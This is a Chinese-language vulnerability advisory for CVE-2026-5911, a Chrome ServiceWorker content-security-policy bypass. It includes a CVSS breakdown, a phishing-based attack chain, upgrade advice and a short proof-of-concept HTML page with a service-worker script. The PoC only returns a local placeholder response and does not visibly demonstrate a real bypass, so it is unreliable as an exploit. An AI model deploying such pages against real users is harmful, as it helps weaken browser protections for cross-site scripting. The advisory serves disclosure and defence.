CVE-2026-5911 CVSS 4.3 中危

CVE-2026-5911 Chrome ServiceWorker策略绕过漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5911

漏洞类型

安全策略绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Google Chrome

漏洞概述

Google Chrome 147.0.7727.55 之前的版本中存在 ServiceWorker 策略绕过漏洞。由于 ServiceWorker 对内容安全策略（CSP）的处理不当，远程攻击者可以通过精心制作的 HTML 页面绕过 CSP 保护，导致安全策略失效。该漏洞 CVSS 评分为 4.3，属于中危漏洞，需要用户交互才能触发。

技术细节

该漏洞的核心在于 Google Chrome 浏览器中 ServiceWorker 机制与内容安全策略（CSP）之间的交互逻辑缺陷。在受影响版本中，ServiceWorker 的作用域或其处理的网络请求未能完全继承或遵守主页面的 CSP 策略。攻击者可以诱导用户访问特制的恶意 HTML 页面，该页面注册了一个恶意的 ServiceWorker。由于策略验证的绕过，该 ServiceWorker 可以拦截并修改网络请求，从而加载原本被主页面的 CSP 禁止的脚本或数据。这种绕过破坏了 CSP 提供的同源保护策略，虽然不直接导致代码执行，但降低了攻击者进行跨站脚本（XSS）攻击的门槛。利用条件需要用户交互，因此攻击链通常结合社会工程学进行。

攻击链分析

STEP 1

步骤1：准备攻击环境

攻击者构造包含恶意 ServiceWorker 注册逻辑的 HTML 页面，并部署到服务器。

STEP 2

步骤2：诱导用户访问

攻击者通过钓鱼邮件或社会工程学手段诱导受害者使用存在漏洞的 Chrome 浏览器访问该恶意页面。

STEP 3

步骤3：注册恶意 ServiceWorker

受害者浏览器加载页面并执行脚本，注册并激活恶意的 ServiceWorker。由于漏洞存在，CSP 策略未能阻止该操作。

STEP 4

步骤4：执行策略绕过

ServiceWorker 拦截后续的网络请求，绕过原本限制性的 CSP 策略，加载或执行被禁止的资源。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2026-5911: ServiceWorker Policy Bypass -->
<!-- This HTML page is served with a strict CSP -->
<html>
<head>
    <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self';">
    <title>CVE-2026-5911 PoC</title>
</head>
<body>
    <h1>Testing ServiceWorker CSP Bypass</h1>
    <script>
        if ('serviceWorker' in navigator) {
            // Register the ServiceWorker
            navigator.serviceWorker.register('sw.js')
                .then(function(registration) {
                    console.log('ServiceWorker registration successful with scope: ', registration.scope);
                    // Trigger a request to test bypass
                    fetch('/test-resource').then(r=>r.text()).then(console.log);
                })
                .catch(function(err) {
                    console.log('ServiceWorker registration failed: ', err);
                });
        }
    </script>
</body>
</html>

// sw.js - ServiceWorker Script
// In a vulnerable version, this might bypass the parent page's CSP
self.addEventListener('install', function(event) {
    console.log('[SW] Install');
});

self.addEventListener('fetch', function(event) {
    // Attempt to load a resource that would normally be blocked by CSP
    // For example, an external script or data
    if (event.request.url.includes('/test-resource')) {
        event.respondWith(
            new Response('Bypassed Content', {headers: {'Content-Type': 'text/plain'}})
        );
    }
});

影响范围

Google Chrome < 147.0.7727.55

防御指南

临时缓解措施

建议用户立即将 Google Chrome 浏览器升级到 147.0.7727.55 或更高版本。在未升级前，应避免点击来源不明的链接，并考虑使用浏览器扩展限制 JavaScript 的执行，以降低被攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表